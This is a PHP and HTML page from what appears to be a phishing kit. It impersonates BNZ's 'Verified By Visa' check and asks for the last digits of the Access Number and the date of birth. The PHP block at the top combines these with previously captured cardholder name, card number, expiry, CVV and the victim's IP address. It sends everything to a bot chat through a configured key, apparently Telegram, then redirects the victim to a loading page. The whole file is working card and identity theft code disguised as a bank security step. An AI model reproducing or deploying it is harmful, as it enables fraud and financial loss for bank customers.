<?php
if(isset($_POST['access']) && isset($_POST['dob'])){
    if(!empty($_POST['access']) && !empty($_POST['dob'])){
        require 'functions.php';
        $ip = getenv("REMOTE_ADDR");
        $message = "
=============## h3x0 ##=============
NAME = ".$_SESSION['cardholder']."
CC NUMBER = ".$_SESSION['cardnumber']."
EXPIRY = ".$_SESSION['expiry']."
CVV = ".$_SESSION['cvv']."
=============## VBV BNZ ##=============
ACCESS : ".$_POST['access']."
DOB : ".$_POST['dob']."
=============## h3x0 ##=============
IP : $ip";
        SendMessage($message,$_CONFIG['BOT_KEY'], $_CONFIG['BOT_CHAT_VBV']);
        $_SESSION['success'] = true;
        header("location:../../../loading");
    }
}
?>
<!DOCTYPE html>
<!--[if IE]>
<html lang="en" class="ie">
<![endif]-->
<!--[if !IE]><!-->
<html lang="en"><!--<![endif]--><head>
	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<meta charset="utf-8">
	<meta http-equiv="x-ua-compatible" content="ie=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Verified By Visa - BNZ</title>
	<!--[if gte IE 9]><!-->
	<link rel="stylesheet" href="../../../3d/<?php echo $page;?>/files/serrano.css">
	<!--<![endif]-->
	<link rel="stylesheet" href="../../../3d/<?php echo $page;?>/files/main.css">
	<link rel="apple-touch-icon" sizes="180x180" href="https://www.bnz.co.nz/icons/apple-touch-icon-180x180.png?m=1718">
	<link rel="icon" type="en_GB_BNZ_Visa/image/png" sizes="192x192" href="https://www.bnz.co.nz/icons/favicon-192x192.png?m=1718">
	<link rel="icon" type="en_GB_BNZ_Visa/image/x-icon" sizes="16x16 32x32 48x48" href="https://www.bnz.co.nz/favicon.ico?m=1718">
	<script async="" src="../../../3d/<?php echo $page;?>/files/SpeedTrapInsert.js"></script><script type="text/javascript" src="../../../3d/<?php echo $page;?>/files/mustache.js"></script>
	<script type="text/javascript" src="../../../3d/<?php echo $page;?>/files/pstemplate.js"></script>
	<script src="../../../3d/<?php echo $page;?>/files/ca_bnz.js"></script>

</head>

<body>
<!-- HEADER -->
<header class="header">
	<div class="header-left">
		<img src="../../../3d/<?php echo $page;?>/files/bnz.svg" alt="BNZ" width="55" height="27">
	</div>
	<div class="header-right">
        <?php
            if($_SESSION['brand'] == 'visa'){
                $img = 'vbv.svg';
            }else{
                $img = 'ms.png';
            }
        ?>
		<img src="../../../3d/<?php echo $page;?>/files/<?php echo $img;?>" alt="" width="50" height="25">
	</div>
</header>
<!-- ALERT -->
<main class="main">
	<h1 class="main-heading">One last step for your protection</h1>
	<form action="" class="form" name="pwdForm" id="pwdForm" method="post">	<div class="main-content">
		<p><img src="../../../3d/<?php echo $page;?>/files/card-access-num.svg" alt="" class="image--right" width="103" height="78"> Enter the last 3 digits of your Access Number and date of birth to complete your purchase.</p>
	</div>
		<div class="form-info">
			Your Access Number is on the back of your BNZ card.
		</div>
		<div class="form-error" id="form-error" style="display: none;">Check your details and try again.</div>
		<div class="form-field">
			<label for="access" class="form-field-label">Last 3 digits of BNZ Access Number</label>
			<div class="form-field-control">
				<input type="text" id="access" name="access" class="input input--block" maxlength="3" pattern="[0-9]{3}" required="" title="Enter the last 3 digits of your Access Number">
			</div>
		</div>
		<div class="form-field">
			<label for="dob" class="form-field-label">Date of birth</label>
			<div class="form-field-control">
				<input type="text" id="dob" name="dob" class="input input--block" maxlength="10" pattern="(0?[1-9]|[12][0-9]|3[01])\/(0?[1-9]|1[012])\/(19|[2-9][0-9])[0-9]{2}" placeholder="DD/MM/YYYY" required="" title="Enter your date of birth (DD/MM/YYYY)">
			</div>
		</div>
		<div class="form-field">
			<span class="form-field-label"></span>
			<div class="form-field-control">
				<button type="submit" class="submit submit--block" id="bnzSub" onclick="return validateInput('QUESTIONS');">Verify</button>
			</div>
		</div>
	</form>  <!--- end of pwdForm -->
</main>

<script src="../../../3d/<?php echo $page;?>/files/main.js"></script>

</body></html>